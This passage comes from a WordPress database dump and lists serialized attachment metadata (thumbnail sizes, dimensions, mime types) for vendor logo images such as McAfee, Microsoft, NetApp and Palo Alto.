ge\";a:4:{s:4:\"file\";s:25:\"Logo-Adobe-1-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"Logo-Adobe-1-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"Logo-Adobe-1-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"Logo-Adobe-1-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"Logo-Adobe-1-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1665,1697,'_wp_attached_file','2018/12/Logo-TV.jpg'),(1666,1697,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:19:\"2018/12/Logo-TV.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Logo-TV-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"Logo-TV-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"Logo-TV-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"Logo-TV-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:19:\"Logo-TV-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:19:\"Logo-TV-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:19:\"Logo-TV-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:17:\"Logo-TV-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1667,1698,'_wp_attached_file','2018/12/Logo-Veeam.jpg'),(1668,1698,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:22:\"2018/12/Logo-Veeam.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Logo-Veeam-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Logo-Veeam-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Logo-Veeam-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Logo-Veeam-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:22:\"Logo-Veeam-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:22:\"Logo-Veeam-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:22:\"Logo-Veeam-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1669,1699,'_wp_attached_file','2018/12/McAfee-Logo.jpg'),(1670,1699,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:23:\"2018/12/McAfee-Logo.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"McAfee-Logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"McAfee-Logo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"McAfee-Logo-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"McAfee-Logo-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:23:\"McAfee-Logo-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:23:\"McAfee-Logo-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:23:\"McAfee-Logo-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1671,1700,'_wp_attached_file','2018/12/Microsoft-Logo.jpg'),(1672,1700,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:26:\"2018/12/Microsoft-Logo.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Microsoft-Logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Microsoft-Logo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"Microsoft-Logo-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"Microsoft-Logo-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"Microsoft-Logo-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"Microsoft-Logo-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:26:\"Microsoft-Logo-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:24:\"Microsoft-Logo-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1673,1701,'_wp_attached_file','2018/12/NetApp-Logo.jpg'),(1674,1701,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:23:\"2018/12/NetApp-Logo.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"NetApp-Logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"NetApp-Logo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"NetApp-Logo-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"NetApp-Logo-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:23:\"NetApp-Logo-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:23:\"NetApp-Logo-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:23:\"NetApp-Logo-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:21:\"NetApp-Logo-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1675,1702,'_wp_attached_file','2018/12/OpenVoice-Logo.jpg'),(1676,1702,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:26:\"2018/12/OpenVoice-Logo.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"OpenVoice-Logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"OpenVoice-Logo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"OpenVoice-Logo-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"OpenVoice-Logo-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"OpenVoice-Logo-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"OpenVoice-Logo-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:26:\"OpenVoice-Logo-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1677,1703,'_wp_attached_file','2018/12/Palo-Alto.jpg'),(1678,1703,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:21:\"2018/12/Palo-Alto.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Palo-Alto-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"Palo-Alto-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"Palo-Alto-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"Palo-Alto-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"Palo-Alto-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"Palo-Alto-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:21:\"Palo-Alto-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:19:\"Palo-Alto-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1679,1704,'_wp_attached_file','2018/12/RedhatLogo.jpg'),(1680,1704,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:22:\"2018/12/RedhatLogo.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"RedhatLogo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"RedhatLogo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"RedhatLogo-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"RedhatLogo-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:22:\"RedhatLogo-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:22:\"RedhatLogo-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:22:\"RedhatLogo-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1681,1705,'_wp_attached_file','2018/12/Rescue-Logo.jpg'),(1682,1705,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:23:\"2018/12/Rescue-Logo.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"Rescue-Logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"Rescue-Logo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"Rescue-Logo-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"Rescue-Logo-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:23:\"Rescue-Logo-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:23:\"Rescue-Logo-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:23:\"Rescue-Logo-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1683,1706,'_wp_attached_file','2018/12/ruckus-logo.jpg'),(1684,1706,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:23:\"2018/12/ruckus-logo.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"ruckus-logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"ruckus-logo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"ruckus-logo-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"ruckus-logo-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:23:\"ruckus-logo-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:23:\"ruckus-logo-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:23:\"ruckus-logo-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1685,1707,'_wp_attached_file','2018/12/Samsung-Logo.jpg'),(1686,1707,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:24:\"2018/12/Samsung-Logo.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Samsung-Logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Samsung-Logo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Samsung-Logo-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Samsung-Logo-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"Samsung-Logo-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"Samsung-Logo-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"Samsung-Logo-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"Samsung-Logo-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1687,1708,'_wp_attached_file','2018/12/Sangfor-Logo.jpg'),(1688,1708,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:24:\"2018/12/Sangfor-Logo.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Sangfor-Logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Sangfor-Logo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Sangfor-Logo-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Sangfor-Logo-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"Sangfor-Logo-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"Sangfor-Logo-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"Sangfor-Logo-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1689,1709,'_wp_attached_file','2018/12/Seagate-Logo.jpg'),(1690,1709,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:24:\"2018/12/Seagate-Logo.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Seagate-Logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\